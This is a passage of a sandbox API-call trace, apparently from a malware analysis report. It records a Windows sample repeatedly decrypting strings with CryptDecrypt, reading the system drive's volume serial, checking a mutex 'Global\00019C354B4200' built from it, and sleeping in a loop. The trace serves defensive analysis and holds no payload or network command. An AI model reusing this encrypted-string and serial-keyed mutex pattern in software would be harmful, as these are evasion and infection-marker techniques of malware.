pbData=0x20fc2e8, pdwDataLen=0x221f7e4) returned 1 [0216.241] CryptDestroyKey (hKey=0xa328a8) returned 1 [0216.241] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0216.241] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9d8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0216.241] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda28 | out: hHeap=0x20f0000) returned 1 [0216.241] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda00 | out: hHeap=0x20f0000) returned 1 [0216.241] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0216.241] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0216.241] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0216.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0216.241] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0216.241] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0216.241] CryptDestroyKey (hKey=0xa328a8) returned 1 [0216.241] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0216.241] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x154 [0216.241] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0x0) returned 0x102 [0216.241] CloseHandle (hObject=0x154) returned 1 [0216.241] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0216.241] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0216.241] Sleep (dwMilliseconds=0x3e8) [0219.983] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9d8 [0219.983] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0219.984] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0219.984] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9d8, pdwDataLen=0x221f80c | out: pbData=0x20fd9d8, pdwDataLen=0x221f80c) returned 1 [0219.984] CryptDestroyKey (hKey=0xa328a8) returned 1 [0219.984] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fda00 [0219.984] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fda28 [0219.984] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20fc2e8 [0219.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0219.984] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0219.984] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x221f7e4 | out: pbData=0x20fc2e8, pdwDataLen=0x221f7e4) returned 1 [0219.984] CryptDestroyKey (hKey=0xa328a8) returned 1 [0219.984] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0219.984] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fda00, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0219.984] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda28 | out: hHeap=0x20f0000) returned 1 [0219.984] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0219.984] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.984] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda00 | out: hHeap=0x20f0000) returned 1 [0219.984] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0219.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0219.984] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0219.984] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0219.984] CryptDestroyKey (hKey=0xa328a8) returned 1 [0219.984] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0219.984] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x154 [0219.984] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0x0) returned 0x102 [0219.984] CloseHandle (hObject=0x154) returned 1 [0219.984] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0219.984] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0219.984] Sleep (dwMilliseconds=0x3e8) [0221.200] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fda00 [0221.200] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0221.200] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0221.200] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fda00, pdwDataLen=0x221f80c | out: pbData=0x20fda00, pdwDataLen=0x221f80c) returned 1 [0221.200] CryptDestroyKey (hKey=0xa328a8) returned 1 [0221.200] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9d8 [0221.200] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fda28 [0221.200] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20fc2e8 [0221.200] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0221.200] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0221.200] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x221f7e4 | out: pbData=0x20fc2e8, pdwDataLen=0x221f7e4) returned 1 [0221.200] CryptDestroyKey (hKey=0xa328a8) returned 1 [0221.200] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0221.200] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9d8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0221.201] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda28 | out: hHeap=0x20f0000) returned 1 [0221.201] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda00 | out: hHeap=0x20f0000) returned 1 [0221.201] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0221.201] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0221.201] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0221.201] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0221.201] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0221.201] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0221.201] CryptDestroyKey (hKey=0xa328a8) returned 1 [0221.201] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0221.201] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xb4 [0221.201] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x0) returned 0x102 [0221.201] CloseHandle (hObject=0xb4) returned 1 [0221.201] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0221.201] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0221.201] Sleep (dwMilliseconds=0x3e8) [0222.366] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0222.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32b28) returned 1 [0222.366] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0222.366] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0222.366] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0222.366] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0222.367] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0222.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32b28) returned 1 [0222.367] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0222.367] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0222.367] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0222.367] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0222.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0222.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0222.367] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0222.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0222.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32b28) returned 1 [0222.367] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0222.367] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0222.367] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f16c0 [0222.367] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xec [0222.367] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0x0) returned 0x102 [0222.367] CloseHandle (hObject=0xec) returned 1 [0222.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0222.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0222.367] Sleep (dwMilliseconds=0x3e8) [0223.370] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0223.370] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0223.371] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0223.371] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0223.371] CryptDestroyKey (hKey=0xa328a8) returned 1 [0223.371] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0223.371] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0223.371] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0223.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0223.371] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0223.371] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0223.371] CryptDestroyKey (hKey=0xa328a8) returned 1 [0223.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0223.371] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0223.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0223.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0223.371] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0223.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0223.371] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0223.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0223.371] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0223.371] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0223.371] CryptDestroyKey (hKey=0xa328a8) returned 1 [0223.371] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0223.371] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0223.371] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0223.371] CloseHandle (hObject=0x1e4) returned 1 [0223.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0223.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0223.371] Sleep (dwMilliseconds=0x3e8) [0224.663] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0224.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0224.663] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0224.663] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0224.663] CryptDestroyKey (hKey=0xa328a8) returned 1 [0224.663] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0224.663] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0224.664] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0224.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0224.664] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0224.664] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0224.664] CryptDestroyKey (hKey=0xa328a8) returned 1 [0224.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0224.664] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0224.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0224.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0224.664] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0224.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0224.664] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0224.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0224.664] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0224.664] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0224.664] CryptDestroyKey (hKey=0xa328a8) returned 1 [0224.664] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0224.664] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0224.664] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0224.664] CloseHandle (hObject=0x1e4) returned 1 [0224.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0224.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0224.664] Sleep (dwMilliseconds=0x3e8) [0226.005] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0226.005] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0226.005] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0226.005] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0226.005] CryptDestroyKey (hKey=0xa328a8) returned 1 [0226.005] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0226.005] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0226.005] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0226.005] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0226.005] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0226.005] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x221f7e4 | out: pbData=0x20f5498, pdwDataLen=0x221f7e4) returned 1 [0226.005] CryptDestroyKey (hKey=0xa328a8) returned 1 [0226.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0226.006] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0226.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0226.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0226.006] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0226.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0226.006] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0226.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0226.006] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0226.006] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x221f840 | out: pbData=0x20f5910, pdwDataLen=0x221f840) returned 1 [0226.006] CryptDestroyKey (hKey=0xa328a8) returned 1 [0226.006] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0226.006] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x1e4 [0226.006] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0x0) returned 0x102 [0226.006] CloseHandle (hObject=0x1e4) returned 1 [0226.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0226.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0226.006] Sleep (dwMilliseconds=0x3e8) [0227.032] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0227.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0227.032] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0227.032] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0227.032] CryptDestroyKey (hKey=0xa328a8) returned 1 [0227.032] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0227.032] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0227.032] 